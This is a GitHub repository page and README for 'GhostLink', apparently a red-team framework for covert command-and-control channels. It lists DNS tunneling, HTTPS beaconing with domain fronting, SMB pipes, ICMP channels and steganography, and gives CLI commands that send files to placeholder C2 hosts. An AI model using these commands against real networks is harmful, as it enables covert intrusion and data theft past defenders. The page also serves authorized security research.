Skip to content

bypasscore/ghostlink

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
docs
docs
 
 
src
src
 
 
tests
tests
 
 
.gitignore
.gitignore
 
 
CMakeLists.txt
CMakeLists.txt
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

GhostLink

Covert C2 Communication and Channel Research Framework

GhostLink is a research framework for studying covert communication channels used in red team operations. It implements various C2 channel techniques including DNS tunneling, HTTPS beaconing, named pipe communication, and steganographic data exfiltration.

Disclaimer: This tool is intended for authorized security research, penetration testing, and educational purposes only. Use of this software against systems without explicit authorization is illegal and unethical. The authors are not responsible for any misuse.

Features

  • DNS Tunneling — Encode data in DNS queries/responses (TXT, CNAME, A records, CNAME chaining)
  • HTTPS Beaconing — Malleable C2 profiles, domain fronting, configurable jitter
  • Named Pipe Channel — Local/remote SMB pipe communication with impersonation and SMB3 encryption
  • ICMP Covert Channel — Data hidden in ICMP echo payloads with fragmentation
  • Steganographic Encoding — LSB image embedding (BMP) with scatter mode
  • Encryption — AES-256-GCM and ChaCha20-Poly1305
  • Channel Manager — Multi-channel failover, round-robin, priority-based selection
  • Traffic Analysis Resistance — Timing jitter, payload padding, dummy traffic generation

Architecture

+---------------------------------------------------+
|                   CLI / API                        |
+---------------------------------------------------+
|                Channel Manager                     |
|   (Failover, Round-Robin, Random, Least-Latency)  |
+---------------------------------------------------+
|     Protocol Codec        |    Encryption Layer    |
|  (Framing, Compression)   | (AES-GCM, ChaCha20)   |
+---------------------------------------------------+
|  DNS    | HTTPS  | Named  | ICMP   | Stego        |
|  Tunnel | Beacon | Pipe   | Covert | Encoding     |
+---------------------------------------------------+
|              OS Network / IPC Layer                |
+---------------------------------------------------+

Build

Requirements

  • CMake 3.16+
  • C++17 compiler (MSVC 2019+, GCC 9+, Clang 10+)
  • Windows SDK (for CNG crypto and WinHTTP)

Build Instructions

mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
cmake --build . --config Release

Run Tests

cd build
ctest --output-on-failure

Usage

Generate Encryption Keys

ghostlink keygen

DNS Tunnel

# Start listener
ghostlink listen -t dns -d data.example.com --verbose

# Connect and send data
ghostlink connect -t dns -h 8.8.8.8 -d c2.example.com -i payload.bin

HTTPS Beacon

# Connect with jitter
ghostlink connect -t https -h c2server.com -p 443 --sleep 30000 --jitter 40

# With domain fronting
ghostlink connect -t https -h cdn.legit.com -p 443 --profile fronting

Named Pipe

# Local pipe listener
ghostlink listen -t pipe -n ghostlink_c2

# Remote pipe via SMB
ghostlink connect -t pipe -h 192.168.1.100 -n ghostlink_c2

ICMP Covert Channel

ghostlink connect -t icmp -h 10.0.0.1 -i secret.txt

Steganographic Encoding

ghostlink encode -i secret.txt -o cover.bmp --type stego

Bidirectional Tunnel

ghostlink tunnel -t dns -h resolver.example.com -d tunnel.example.com

Self-Test

ghostlink test --verbose

Project Structure

ghostlink/
├── src/
│   ├── core/
│   │   ├── channel.h            # Abstract channel interface
│   │   ├── channel_manager.h    # Multi-channel orchestration
│   │   ├── channel_manager.cpp
│   │   ├── crypto.h             # Encryption layer
│   │   ├── crypto.cpp
│   │   ├── protocol.h           # Wire protocol
│   │   └── protocol.cpp
│   ├── channels/
│   │   ├── dns_tunnel.h/.cpp    # DNS tunneling
│   │   ├── https_beacon.h/.cpp  # HTTPS beaconing
│   │   ├── named_pipe.h/.cpp    # Named pipe channel
│   │   └── icmp_channel.h/.cpp  # ICMP covert channel
│   ├── encoding/
│   │   ├── base32.h/.cpp        # Base32 encoding
│   │   └── steganography.h/.cpp # LSB image encoding
│   ├── utils/
│   │   └── jitter.h/.cpp        # Timing jitter utilities
│   └── main.cpp                 # CLI entry point
├── tests/
│   ├── test_crypto.cpp          # Crypto unit tests
│   └── test_dns_encoding.cpp    # DNS encoding tests
├── docs/
│   ├── channel-architecture.md
│   └── covert-channels-overview.md
├── CMakeLists.txt
├── LICENSE
└── README.md

Contact

Support

Help keep BypassCore open-source and independent.

Network Address
Polygon 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Ethereum 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
BSC 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Arbitrum 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Optimism 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Avalanche 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a

USDT / USDC / ETH / BNB accepted on all networks.

License

MIT License - see LICENSE for details.

About

Covert C2 communication and channel research framework

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages